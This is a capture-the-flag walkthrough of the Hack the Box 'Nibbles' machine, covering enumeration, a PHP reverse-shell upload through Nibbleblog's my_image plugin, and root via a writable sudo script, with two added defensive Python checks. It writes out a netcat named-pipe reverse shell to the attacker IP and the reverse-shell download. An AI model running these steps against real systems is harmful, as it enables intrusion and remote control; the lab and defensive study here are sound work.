Hack the Box - Nibbles - Walkthrough

Introduction

Today we're going to be doing a pentest walkthrough of the Nibbles machine hosted at https://hackthebox.eu. For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Nibbles machine as the victim system. After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.99.239.

Scanning and Enumeration

We'll start by scanning for open ports with Nmap:

nmap -T4 -p- 10.129.99.239


Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:

sudo nmap -sV -T4 -p22,80 10.129.99.239


The target has a web service running on port 80. Let's visit that page now:

http://10.129.99.239/


Not much here, but let's take a look at the page's source:

view-source:http://10.129.99.239/


This source hints at a directory called /nibbleblog. Let's follow up on that:


We've confirmed that there's a blog here. Now that we have a root directory for this website, let's do some directory busting with Gobuster:

gobuster dir -u http://10.129.99.239/nibbleblog/ -w /usr/share/wordlists/dirb/big.txt -r -x php,bak,html,txt,tar -s 200,204,301,302,307,403,401



We'll be investigating each of these entries eventually, starting with README:

http://10.129.99.239/nibbleblog/README


Here we can confirm the software running the blog, Nibbleblog version 4.0.3. Let's see if Google can give us anything:

Google search string: nibbleblog 4.0.3 exploit




Finding a Way In

The exploit we found requires admin access to the blog, access to the upload web directory, and a malicious file for us to upload.

Investigating the /nibbleblog/content directory eventually leads us to this page:

http://10.129.99.239/nibbleblog/content/private/plugins/my_image


This is likely the directory where our file will be stored after we upload it. Now to visit the admin.php page:

http://10.129.99.239/nibbleblog/admin.php


We try logging in as username: admin, password: nibbles, and it works.

http://10.129.99.239/nibbleblog/admin.php?controller=dashboard&action=view




Before we go through with uploading a file through the web app, let's prepare the PHP file we want to upload and set up our Netcat listener. The PHP file we will use can be found here:

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

Let's download the file to our working directory:

wget -O customPHPrevShell.php https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php


Then we'll modify the PHP file to point at our attacking system (the IP address and port our listener will use):


Then we set up our Netcat listener:

sudo nc -nlvp 443


Now we can go back to the web app and upload our PHP file:

http://10.129.99.239/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image

Here we click the browse button:


Then select our PHP file and click "Open".


Then, to finish the file upload process, we click the "Save changes" button.


With our file uploaded to the server, we can now go back to the my_image plugin directory to look for our PHP file:

http://10.129.99.239/nibbleblog/content/private/plugins/my_image


The file was renamed when it was uploaded, but here it is. Let's access it and open up our reverse shell:

http://10.129.99.239/nibbleblog/content/private/plugins/my_image/image.php



This PHP reverse shell has already done a little work for us: on connecting it prints our user's name and the OS version.
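From the defender's side, the upload chain above leaves two distinctive requests in the web server's access log: a POST to the my_image plugin configuration page, followed by a request for a script file under content/private/plugins/. The following detector is an added example, not part of the original walkthrough; the Apache combined-log lines it runs over are constructed samples, and the field layout assumed is the standard combined format.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed Apache combined-log sample (not taken from the box); it mirrors the request
# sequence the walkthrough makes: upload through the plugin config page, then hit the file.
SAMPLE_LOG = """\
10.10.14.84 - - [12/Mar/2021:10:01:02 +0000] "GET /nibbleblog/admin.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
10.10.14.84 - - [12/Mar/2021:10:01:30 +0000] "POST /nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.10.14.84 - - [12/Mar/2021:10:02:05 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.10.14.20 - - [12/Mar/2021:10:02:40 +0000] "GET /nibbleblog/content/private/plugins/my_image/image.jpg HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
SCRIPT_EXT = re.compile(r'\.(php|phtml|phar|php[3-7])$', re.IGNORECASE)  # anything the PHP handler would run

def classify(line):
    """Return a reason string for one access-log line, or None if it is not part of the pattern."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlparse(m.group("path"))
    query = parse_qs(url.query)
    # Step 1 of the attack: a POST to the plugin configuration page performs the upload.
    if (m.group("method") == "POST" and url.path.endswith("/admin.php")
            and query.get("controller") == ["plugins"] and query.get("plugin") == ["my_image"]):
        return "upload via my_image plugin config page"
    # Step 2: a request that executes a script stored under content/private/plugins/.
    if "/content/private/plugins/" in url.path and SCRIPT_EXT.search(url.path):
        return "script requested from the plugin content directory"
    return None

def find_suspicious(log_text):
    """Return [(ip, timestamp, reason)] for every matching line."""
    hits = []
    for line in log_text.splitlines():
        reason = classify(line)
        if reason:
            m = LOG_RE.match(line)
            hits.append((m.group("ip"), m.group("ts"), reason))
    return hits

def chain_sources(hits):
    """IPs seen doing both steps, i.e. the full upload-then-execute chain from one source."""
    by_ip = {}
    for ip, _, reason in hits:
        by_ip.setdefault(ip, set()).add(reason)
    return sorted(ip for ip, reasons in by_ip.items() if len(reasons) == 2)
```

The matching hardening is to deny script execution under the blog's content directory in the web server configuration, so an uploaded .php file is never run even if the plugin accepts it.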

Capturing the User Flag

We'll take this opportunity to collect the system's user flag. User flags on Hack the Box Linux machines are usually located in a user's /home directory. Let's go get that now:

cat /home/nibbler/user.txt


Privilege Escalation

Let's see if our user can run any commands as root:

sudo -l


It looks like our user can execute a specific bash script file as root. Let's take a look at the user's home directory:

cd /home/nibbler/
ls


Now let's unzip this file and see what comes out:

unzip personal.zip


There's the monitor.sh script that the sudo -l output was referring to. If we can run this script as root and we can write to the file, then we can set up another Netcat listener on our attacking machine and write instructions into the script that open a reverse shell to our attacking system. Since the script will run as root, the reverse shell we receive will be a root shell. First, let's start our second Netcat listener:

sudo nc -nlvp 80


Then we write a reverse shell to the monitor.sh script and execute it with sudo:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.84 80 >/tmp/f" > monitor.sh
sudo ./monitor.sh
whoami
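The root cause here is a sudo rule that points at a script the invoking user can modify. The audit below is an added example, not from the walkthrough: it parses simplified sudoers user specifications (one "user host=(runas) commands" line each, no aliases or includes) and reports any sudo-runnable program, or its parent directory, that users other than the owner can write to. The nibbler user and monitor.sh name come from the page; the rule text and files are constructed in a temporary directory, and the backup.sh path is an assumption.

```python
import os
import tempfile

TAGS = {"NOPASSWD:", "PASSWD:", "SETENV:", "NOSETENV:", "NOEXEC:", "EXEC:", "LOG_INPUT:", "LOG_OUTPUT:"}  # sudoers command tags
GROUP_OR_OTHER_WRITE = 0o022  # mode bits that let users other than the owner modify the path

def parse_sudoers(text):
    """Yield (user, [program paths]) per user-spec line. Simplified: 'user host=(runas) cmds', no aliases/includes."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")):
            continue
        parts = line.split(None, 2)  # user, host=(runas) spec, comma-separated command list
        if len(parts) < 3:
            continue
        paths = []
        for cmd in parts[2].split(","):
            tokens = [t for t in cmd.split() if t not in TAGS]
            if tokens and tokens[0].startswith("/"):  # first token is the program; arguments are ignored
                paths.append(tokens[0])
        yield parts[0], paths

def weak_permissions(path):
    """Reasons a non-root user could change what sudo executes for this path (empty list means none found)."""
    try:
        mode = os.stat(path).st_mode
    except FileNotFoundError:
        return ["file does not exist, so whoever can create it controls what sudo runs"]
    reasons = []
    if mode & GROUP_OR_OTHER_WRITE:
        reasons.append("file is group/other writable")
    if os.stat(os.path.dirname(path) or "/").st_mode & GROUP_OR_OTHER_WRITE:
        reasons.append("parent directory is group/other writable, so the file can be replaced")
    return reasons

def audit(text):
    """Return [(user, path, reason)] for every sudo-runnable program with weak permissions."""
    return [(u, p, r) for u, paths in parse_sudoers(text) for p in paths for r in weak_permissions(p)]

def demo():
    """Constructed scenario in a private temp dir: a world-writable monitor.sh beside a correctly locked-down script."""
    d = tempfile.mkdtemp()  # created mode 0700, so the parent-directory check stays quiet here
    bad, good = os.path.join(d, "monitor.sh"), os.path.join(d, "backup.sh")
    for p, mode in ((bad, 0o777), (good, 0o755)):
        with open(p, "w") as f:
            f.write("#!/bin/bash\n")
        os.chmod(p, mode)
    rule = f"nibbler ALL=(root) NOPASSWD: {bad}, {good}\n"  # constructed rule, not the box's real sudoers file
    return [(u, os.path.basename(p), r) for u, p, r in audit(rule)]
```

Running audit() over the real /etc/sudoers (and /etc/sudoers.d entries) as root is the practical check; the fix for a finding is to make the script root-owned and mode 755 or tighter, in a directory the user cannot write to.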



Capturing the Root Flag

The root flag on Hack the Box Linux systems is usually located in the /root directory. Let's capture it now:

cat /root/root.txt


Summary

After initial scans, we found that the target's blog software had an arbitrary file upload vulnerability, which we used to establish a foothold on the system. Once in, we found that our logged-in user was able to run a script file as root, which let us open a root shell on our attacking system and capture the objective flag file.

Finish
